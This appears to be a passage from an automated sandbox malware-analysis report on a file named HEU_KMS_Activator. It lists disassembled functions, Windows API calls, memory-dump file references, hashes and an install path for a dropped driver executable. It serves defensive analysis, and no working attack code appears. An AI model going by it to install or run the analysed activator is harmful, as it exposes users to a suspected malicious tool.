    Function 00406F3D Relevance: 5.2, APIs: 4, Instructions: 210COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 343e0a7b9e8e49579bcbe0d762fb74f202d8048176bc0b459f53e81f01b2feea
    • Instruction ID: 128c248792c808fd345d21b212874807cbb34a3c6489e1ba71df23d81ab00ab8
    • Opcode Fuzzy Hash: 343e0a7b9e8e49579bcbe0d762fb74f202d8048176bc0b459f53e81f01b2feea
    • Instruction Fuzzy Hash: E7914471904248EBDF18CF19C8947A93BB1FF44355F11812AFC5AAB291C778E985CF89
    Function 0040678D Relevance: 5.2, APIs: 4, Instructions: 200COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d61f4907ba9eba15e7b927b050d35d28d963894a733207ae1bec07345276297f
    • Instruction ID: a1428bf5e934a8da67950cb1a4e31238322b9b623b650a7710aa00f8669217ce
    • Opcode Fuzzy Hash: d61f4907ba9eba15e7b927b050d35d28d963894a733207ae1bec07345276297f
    • Instruction Fuzzy Hash: C3816772904218DBDB14CF29C8846AA3BB1FF44355F11812AFC66AB3D0D378E985CF85
    Function 00406BCD Relevance: 5.2, APIs: 4, Instructions: 178COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a13d0d67498c19a5f7f37731d51fa10f7b052ae4d415230544ebf08ec861a897
    • Instruction ID: a345c45b08a0fe712b4b444981b17a00aae7dbab26e66ce766d38a34347c3127
    • Opcode Fuzzy Hash: a13d0d67498c19a5f7f37731d51fa10f7b052ae4d415230544ebf08ec861a897
    • Instruction Fuzzy Hash: 86712471904258EBDF18CF29C884AA93BF1FF44355F01812AFC5AAB291D738E995CF85
    Function 00406CCF Relevance: 5.2, APIs: 4, Instructions: 168COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 8864c4038bf38bdcbc954424f0f4faadc715d4c3dfbb4a637c10816bfd285254
    • Instruction ID: f3230299e38bd29f56d0ffbeda8c1bde680258bd2a591bb66208cfe3900aca32
    • Opcode Fuzzy Hash: 8864c4038bf38bdcbc954424f0f4faadc715d4c3dfbb4a637c10816bfd285254
    • Instruction Fuzzy Hash: D2614571904248EBDF18CF19C884BA93BB1FF44355F01812AFC5AAB291D778E995CF89
    Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 165COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4ceb206248e36403dfca79eb3e1201f06656b7f5723e6cd1c1c3030782f8ac7f
    • Instruction ID: 55e1340be9379fbc86d38aa360a0ddc275db8ce0b4a2ff254698a86f8e959d89
    • Opcode Fuzzy Hash: 4ceb206248e36403dfca79eb3e1201f06656b7f5723e6cd1c1c3030782f8ac7f
    • Instruction Fuzzy Hash: 9B615772904258EBDF18CF29C884BAD3BB1FF44345F01812AFC56AA291D778E995CF85
    Function 004070DD Relevance: 5.2, APIs: 4, Instructions: 155memoryCOMMON
    Download Yara Rule
    APIs
    • GlobalFree.KERNEL32(?), ref: 00406840
    • GlobalAlloc.KERNELBASE(00000040,?,00000000,00004000,004249A0), ref: 00406849
    • GlobalFree.KERNEL32(?), ref: 004068B5
    • GlobalAlloc.KERNELBASE(00000040,?,00000000,00004000,004249A0), ref: 004068C0
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Global$AllocFree
    • String ID:
    • API String ID: 3394109436-0
    • Opcode ID: 7f69f18705fb3a2f39afda43d3a9292cde667315888cb2fa2f888119fb812c3b
    • Instruction ID: d37ed04ea5c597886ead4a07dc81eb151e339e51397faf41460444084f42fc09
    • Opcode Fuzzy Hash: 7f69f18705fb3a2f39afda43d3a9292cde667315888cb2fa2f888119fb812c3b
    • Instruction Fuzzy Hash: 84514771904258EBDF18CF29C894BA93BB1FF44355F01812AFC5AAA291D738E985CF84
    Function 0040138F Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
    Download Yara Rule
    APIs
    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013EA
    • SendMessageA.USER32(?,00000402,00000000), ref: 004013FA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend
    • String ID:
    • API String ID: 3850602802-0
    • Opcode ID: d51c94218ee7f6cc50f0b0ce82fda2cfc591bf51415a861e99cb1909a96aac28
    • Instruction ID: b8f878912a4209ab631adbb221dfc4034d5285355c5802a3b4c1a13922bb6b73
    • Opcode Fuzzy Hash: d51c94218ee7f6cc50f0b0ce82fda2cfc591bf51415a861e99cb1909a96aac28
    • Instruction Fuzzy Hash: 0B01F4716242209FD7156B659D05B2B36D8B752B56F10863AF851F72F1DA38CC038B4D
    Function 00403B29 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • FreeLibrary.KERNELBASE(?,00471000,00000000,771B2EE0,00403775,00000000,0040397F,00000000), ref: 00403B43
    • GlobalFree.KERNEL32(?), ref: 00403B4A
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Free$GlobalLibrary
    • String ID:
    • API String ID: 1100898210-0
    • Opcode ID: 7cd3cbd90dded5adf5b4d4440ad2bd2206e7973706f2fe713435f7def5422e2d
    • Instruction ID: 72e48957c01ae18c582f5f4d71976f5bc3e4f249d4ce76183a0a155b01fe1031
    • Opcode Fuzzy Hash: 7cd3cbd90dded5adf5b4d4440ad2bd2206e7973706f2fe713435f7def5422e2d
    • Instruction Fuzzy Hash: 39E08C3250113097C7319F02ED08B5A7B38BF44B26F06083AE8803B2618774AC828AD8
    Function 00405B31 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
    Download Yara Rule
    APIs
    • GetFileAttributesA.KERNELBASE(00000003,004034B5,0047F000,80000000,00000003), ref: 00405B35
    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B57
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$AttributesCreate
    • String ID:
    • API String ID: 415043291-0
    • Opcode ID: 0f3402b6cba962e600cc56c330d8d9fefde8de0d508e0e8224f90466c050da7d
    • Instruction ID: c3e69a66c24273800f0284da14eac39fdb4bb69a611d89429022af49fc3b332c
    • Opcode Fuzzy Hash: 0f3402b6cba962e600cc56c330d8d9fefde8de0d508e0e8224f90466c050da7d
    • Instruction Fuzzy Hash: 16D09E31654301AFEF099F20DE1AF6E7AA2EB84B01F11453CB686940E0DAB15819DB15
    Function 00405B11 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesA.KERNELBASE(?,004066AE,?,?,?), ref: 00405B15
    • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B28
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: a326361d040fe4be9578641be90990488e2144e786cb8665bf2e1c44df0f25fc
    • Instruction ID: 0c7875c7a6039a0948a2cd5e7fcebdd01092d5647bdc414ae539418cebfebeca
    • Opcode Fuzzy Hash: a326361d040fe4be9578641be90990488e2144e786cb8665bf2e1c44df0f25fc
    • Instruction Fuzzy Hash: DAC04CB1404905ABDA015B35EF0D82B7A66EF91331B168739F5BAE00F0CB359CA9DA1D
    Function 00403741 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040397F,00000000), ref: 00403753
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040397F,00000000), ref: 00403767
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: a89e19a7be5a7c5c93e4bba23131e7c034ee9852e65323cb2780d4280781d09f
    • Instruction ID: a7f848d1a215aff991e9bd86a8b3b0d61f4e706e981be1bc374a0f0dd81f6597
    • Opcode Fuzzy Hash: a89e19a7be5a7c5c93e4bba23131e7c034ee9852e65323cb2780d4280781d09f
    • Instruction Fuzzy Hash: FDE0CDB080031466C134BF3CAE49A853B1C6F41336B118726F175F31F0C77C699146AE
    Function 00403180 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
    Download Yara Rule
    APIs
    • ReadFile.KERNELBASE(00408A00,00000000,00000000,00000000,004249A0,0041C998,0040324A,004249A0,00004000,?,00000000,?,0040337C,00000004,00000000,00000000), ref: 00403197
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileRead
    • String ID:
    • API String ID: 2738559852-0
    • Opcode ID: ea88c8a7f1d3987fc34366b1a594ca7d727526782454e813d30f81c20562aa3f
    • Instruction ID: ec576e452d3b6b3ac4c648248f63154295554f3065fc446e17e0cb1c8cccb675
    • Opcode Fuzzy Hash: ea88c8a7f1d3987fc34366b1a594ca7d727526782454e813d30f81c20562aa3f
    • Instruction Fuzzy Hash: 6AE08C32114118BBEB109EA19C00EEB3B6CEB093A2F00C032FA54E9190D638DA20DBE5
    Function 0040370D Relevance: 1.5, APIs: 1, Instructions: 20COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D49
      • Part of subcall function 00405CE3: CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
    • CreateDirectoryA.KERNELBASE(0047B000,00000000,0047B000,0047B000,0047B000,00000000,004038CD), ref: 0040372E
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Char$Next$CreateDirectoryPrev
    • String ID:
    • API String ID: 4115351271-0
    • Opcode ID: 858954e3de4b2f387c3bf652934258a7aca60f9a58578df101b6c0c7d6d76c58
    • Instruction ID: 9c78452db516f5a0e4190c37ba41739f4022116687cb74d30a07a911de451cc8
    • Opcode Fuzzy Hash: 858954e3de4b2f387c3bf652934258a7aca60f9a58578df101b6c0c7d6d76c58
    • Instruction Fuzzy Hash: BDD0A721506E3C31C51132263D06FCF142CDF02719B16803BF404710C15B3C2A4348FD
    Function 004031B2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403697,?), ref: 004031C0
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FilePointer
    • String ID:
    • API String ID: 973152223-0
    • Opcode ID: 11901702bfef1b65c53f91a2b0fa746f63f4eb23d8403f080bab23f40303c9ba
    • Instruction ID: 46a7601c07ffc01ef15a4397163cdfcda81e6631882bf63a0e0e8ad13fee7cd4
    • Opcode Fuzzy Hash: 11901702bfef1b65c53f91a2b0fa746f63f4eb23d8403f080bab23f40303c9ba
    • Instruction Fuzzy Hash: F5B01231150300BFDA214F00DF09F057B61BB94700F208434B3D0380F086711030EB0D

    Non-executed Functions

    Function 00404E68 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 286windowclipboardmemoryCOMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?,00000403), ref: 00404EC7
    • GetDlgItem.USER32(?,000003EE), ref: 00404ED6
    • GetClientRect.USER32(?,?), ref: 00404F2E
    • GetSystemMetrics.USER32(00000015), ref: 00404F36
    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F57
    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F68
    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F7B
    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F89
    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F9C
    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FBE
    • ShowWindow.USER32(?,00000008), ref: 00404FD2
    • GetDlgItem.USER32(?,000003EC), ref: 00404FF3
    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405003
    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405018
    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405024
    • GetDlgItem.USER32(?,000003F8), ref: 00404EE5
      • Part of subcall function 00403C3E: SendMessageA.USER32(00000028,?,00000001,0040553E), ref: 00403C4C
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • GetDlgItem.USER32(?,000003EC), ref: 00405043
    • CreateThread.KERNEL32(00000000,00000000,Function_00004DE2,00000000), ref: 00405051
    • CloseHandle.KERNEL32(00000000), ref: 00405058
    • ShowWindow.USER32(00000000), ref: 0040507C
    • ShowWindow.USER32(?,00000008), ref: 00405081
    • ShowWindow.USER32(00000008), ref: 004050C8
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050FA
    • CreatePopupMenu.USER32 ref: 0040510B
    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405120
    • GetWindowRect.USER32(?,?), ref: 00405133
    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405157
    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405192
    • OpenClipboard.USER32(00000000), ref: 004051A2
    • EmptyClipboard.USER32 ref: 004051A8
    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051B1
    • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051BB
    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CF
    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
    • SetClipboardData.USER32(00000001,00000000), ref: 004051F2
    • CloseClipboard.USER32 ref: 004051F8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
